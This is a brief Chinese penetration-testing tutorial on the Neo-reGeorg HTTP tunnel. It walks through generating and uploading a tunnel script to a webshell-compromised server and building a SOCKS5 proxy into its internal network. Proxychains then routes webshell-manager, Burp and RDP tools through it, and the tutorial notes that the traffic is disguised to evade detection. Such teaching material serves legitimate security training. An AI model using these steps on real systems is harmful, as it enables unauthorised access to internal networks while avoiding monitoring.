本文视频地址
https://www.bilibili.com/video/BV1Ee4y187sT/
简介
Nero reGeorg 内网穿透工具,是应用层的HTTP隧道,传输内容经过变形 base64 加密,伪装成 base64 编码,避免特征检测、提高传输内容保密性。
应用场景
如果我们获取到了一个webshell,但是这台主机无法访问外网(就是不出网),如果我们想内网渗透,那就要利用到regeorg通过HTTP隧道建立socks5通信,
HTTP端口复用,是正向的HTTP隧道socks5代理。
下载地址:
https://github.com/L-codes/Neo-reGeorg/releases/tag/v3.8.1
安装:
git clone https://github.com/L-codes/Neo-reGeorg.git
代理启动步骤:
1生成代理脚本
python neoreg.py generate -k password
python neoreg.py generate -k 123455
2上传代理脚本
3启动代理脚本,在本地建立 socks5 代理
python neoreg.py -k 123455 -u http://192.168.1.4/xycms/uploads_code/tunnel.php
设置proxychains
[ProxyList]
# add proxy here ...
# meanwileS
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 0.0.0.0 1080
如果工具不支持socks5,就通过proxychains等工具走socks代理启动工具,如:
proxychains /usr/java8u202/bin/java -jar Cknife.jar
proxychains /usr/java8u202/bin/java -jar burp.jar
proxychains rdesktop 1.1.1.1
